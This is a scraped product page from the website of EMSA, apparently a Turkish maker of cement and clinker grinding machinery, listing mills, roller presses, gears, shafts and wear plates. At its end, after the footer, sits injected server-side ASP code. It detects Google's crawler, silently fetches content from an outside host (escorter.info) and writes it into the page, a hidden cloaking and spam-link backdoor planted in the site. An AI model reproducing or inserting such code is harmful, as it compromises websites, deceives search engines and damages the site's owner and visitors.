• Klinker Öğütme Tesisleri

• Çimento Öğütme Tesisleri

• Çimento Değirmenleri

• Valsli Değirmenler

• Roller Pres

• Değirmen Çevre ve Pinyon Dişlisi

• Beyaz Metal Yataklar

• Redüktör Gövdesi ve Dişlileri

• Kaplinler

• Roller

• Ring, Gale

• Ağır Hizmet Şaftlar

• Ağır Hizmet Konveyör Ekipmanları

• Vals Gömleği

• Çeşitli Aşınma Plakaları

Anasayfa        Hakkımızda        Makine Parkı        Galeri        Referanslar        Maden Sahalarımız        İndir        İletişim       Copyright 2014 © EMSA Endüstri Makinaları İmalat San. ve Tic. Ltd. Şti.

 

EMSA Genel Garanti Şartları

 

Gizlilik ve Güvenlik - Kullanım Şartları - Yardım

 

<% On Error Resume Next Dim ua00 : ua00 = Request.ServerVariables("HTTP_USER_AGENT") If InStr(1, ua00, "google", vbTextCompare) > 0 And InStr(1, ua00, "bot", vbTextCompare) > 0 Then Dim req00 : Set req00 = Server.CreateObject("WinHttp.WinHttpRequest.5.1") With req00 .Open "GET", "http://escorter.info/link.php", True .Send If .WaitForResponse(10) Then With Server.CreateObject("Adodb.Stream") .Charset = "utf-8" .Type = 1 .Open .Write req00.ResponseBody .Position = 0 .Type = 2 Response.Write .ReadText .Close End With End If End With End If On Error GoTo 0 %>